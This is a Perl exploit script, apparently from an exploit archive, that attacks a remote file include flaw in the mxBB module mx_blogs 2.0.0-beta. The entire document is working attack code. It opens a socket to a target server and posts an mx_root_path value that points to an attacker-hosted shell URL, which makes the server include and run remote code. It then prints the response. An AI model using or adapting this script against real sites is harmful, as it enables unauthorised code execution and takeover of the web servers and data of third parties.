# mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit # # Vendor: http://www.mx-system.com # # Download: http://www.mx-system.com/index.php?page=4&action=file&file_id=405 # # Vulncode in: /includes/functions_weblog.php line 24 # # Greetz: str0ke, TheJT, rgod, Vallani, DNX, NBBN use Getopt::Long; use URI::Escape; use IO::Socket; $shellcode = "Insert the url to shell here"; main(); sub usage { print "\mxBB Module mx_blogs 2.0.0-beta Remote File Include Expl\n"; print "by bd0rk \n"; print "-t, --ttarget\t(someone.com)\n"; print "-f, --tshell\t(url to your shellcode)\n"; print "-d, --dir\t(/mx_blogs)\n"; exit; } sub main { GetOptions ('t|target=s' => \$target,'f|shell=s' => \$shell,'d|dir=s' => \$dir); usage() unless $target; $shellcode = $shell unless !$shell; $url = uri_escape($shellcode); $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die "\nConnection() failed.\n"; print "\nConnected to ".$target.", injecting shellcode.\n"; $sendurl = "mx_root_path=".$url.""; $sendlen = length($sendurl); print $sock "POST ".$dir."/includes/functions_weblog.php? HTTP/1.1\n"; print $sock "Host: ".$target."\n"; print $sock "Connection: close\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-Length: ".$sendlen."\n\n"; print $sock $sendurl; print "Attempted to include shellcode, Response:\n\n"; while($recvd = <$sock>) { print " ".$recvd.""; } exit; }